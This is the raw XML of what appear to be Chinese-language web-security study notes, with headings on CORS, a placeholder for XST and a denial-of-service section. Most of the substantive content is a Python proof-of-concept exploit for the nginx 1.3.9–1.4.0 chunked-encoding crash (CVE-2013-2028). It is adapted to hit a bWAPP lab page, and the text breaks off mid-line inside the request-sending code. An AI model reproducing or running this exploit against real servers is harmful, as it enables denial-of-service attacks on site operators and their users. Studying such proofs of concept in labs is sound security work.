          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A8C83C3" wp14:editId="74F0E540">
            <wp:extent cx="5274310" cy="2391410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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74310" cy="2391410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="350945A5" w14:textId="429B54E7" w:rsidR="00055E17" w:rsidRDefault="00055E17" w:rsidP="00055E17">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨域资源共享</w:t>
      </w:r>
      <w:r w:rsidR="00897641">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00897641">
        <w:t>AJAX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658AE719" w14:textId="77777777" w:rsidR="00055E17" w:rsidRPr="00055E17" w:rsidRDefault="00055E17" w:rsidP="00055E17"/>
    <w:p w14:paraId="30F14495" w14:textId="5C14FB75" w:rsidR="006035CF" w:rsidRDefault="006035CF" w:rsidP="006035CF"/>
    <w:p w14:paraId="2BFF93AB" w14:textId="51DDEEAA" w:rsidR="00897641" w:rsidRDefault="00897641" w:rsidP="00897641">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>XST(cross-site tracing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A19E1A6" w14:textId="7945D582" w:rsidR="00897641" w:rsidRDefault="005E3C1D" w:rsidP="00897641">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待更新</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071CC9A0" w14:textId="77777777" w:rsidR="008F52B4" w:rsidRDefault="008F52B4" w:rsidP="00897641"/>
    <w:p w14:paraId="3A5B91E8" w14:textId="59A5F9C4" w:rsidR="00897641" w:rsidRDefault="00897641" w:rsidP="00897641">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6BC246" w14:textId="7A9F7CF9" w:rsidR="00897641" w:rsidRPr="00897641" w:rsidRDefault="00897641" w:rsidP="00897641">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00897641">
        <w:t>Large Chunk Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426AFE4E" w14:textId="0E9D0A5F" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="002E21E7">
      <w:r>
        <w:t>Dos attack script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A397FC" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="002E21E7"/>
    <w:p w14:paraId="578D194A" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve"># Exploit Title: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> v1.3.9-1.4.0 DOS POC (CVE-2013-2028)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B10153B" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># Date: 16.05.2013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130B611D" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve"># Exploit Author: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SARICA - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [ . ] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sarica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [ @ ] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [ . ] com - http://www.mertsarica.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36993F7F" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve"># Minor customizations by Malik </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mesellem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (@MME_IT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025BA30" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t># Vendor Homepage: http://nginx.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32648F1E" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t># Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D336E8" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t># Version: 1.3.9-1.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEE4748" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t># Tested on: Kali Linux &amp; Windows XP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> v1.4.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73318FA9" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t># CVE : CVE-2013-2028</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6145FF" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="61C72E5D" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="314A80C0" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123A0CDC" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C15DC" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AF6CC4" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7EEC7EDB" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="51CB87BA" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve"># Vars &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0822C144" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>debug = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385D0740" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dos_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0xFFFFFFFFFFFFFFEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EBE8E8" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.setdefaulttimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C52F122" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="44F991EC" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>packet = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355FEC38" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="3BF5DFE2" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">def chunk(data, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629ABC23" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    chunked = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65307F27" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    chunked += "%s\r\n" % (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108ADF5A" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    chunked += "%s\r\n" % (data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA72D8D" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    chunked += "0\r\n\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8B5A5B" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    return chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1630A0" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="61541C40" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.platform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == 'linux-i386' or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.platform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == 'linux2':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CCB0F1" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("clear")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD0AC2" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.platform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == 'win32':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56827C08" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD2AA7" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA2A26" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EFD9B4" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017FCFCC" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>print "======================================================================"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F536CE6" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>u"nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> v1.3.9-1.4.0 DOS POC (CVE-2013-2028) [http://www.mertsarica.com]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E857857" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>print "======================================================================"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41667D35" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="13DE2316" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &lt; 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4CBBF" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        print "Usage: python nginx_dos.py [target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0939468A" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        print "Example: python nginx_dos.py 127.0.0.1:8080\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7553E20A" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E138588" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF67B76" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    host = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[1].lower()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB3B87" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625785D4" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>while packet &lt;= 66:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B60369" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="2BADB47A" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    body = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>beezzzzzzzzzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F18449" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = hex(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dos_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + 1)[3:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696CC7CC" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ("F" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)-1]).upper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D39D0CD" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="7E0C0D54" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    if debug:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F684CF2" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        print "data length:", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(body), "chunk size:", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5CBC73" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="33B66E21" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ABC678" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        con = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9EBAB" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portal.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5902E58C" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>con.putrequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">('POST', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D1163" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>con.putheader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('User-Agent', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F00E186" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>con.putheader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('Accept', '*/*')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8B45C" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>con.putheader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('Transfer-Encoding', 'chunked')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C0FBA" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>con.putheader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('Content-Type', 'application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53443866" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>con.endheaders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B347532" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>con.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(chunk(body, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
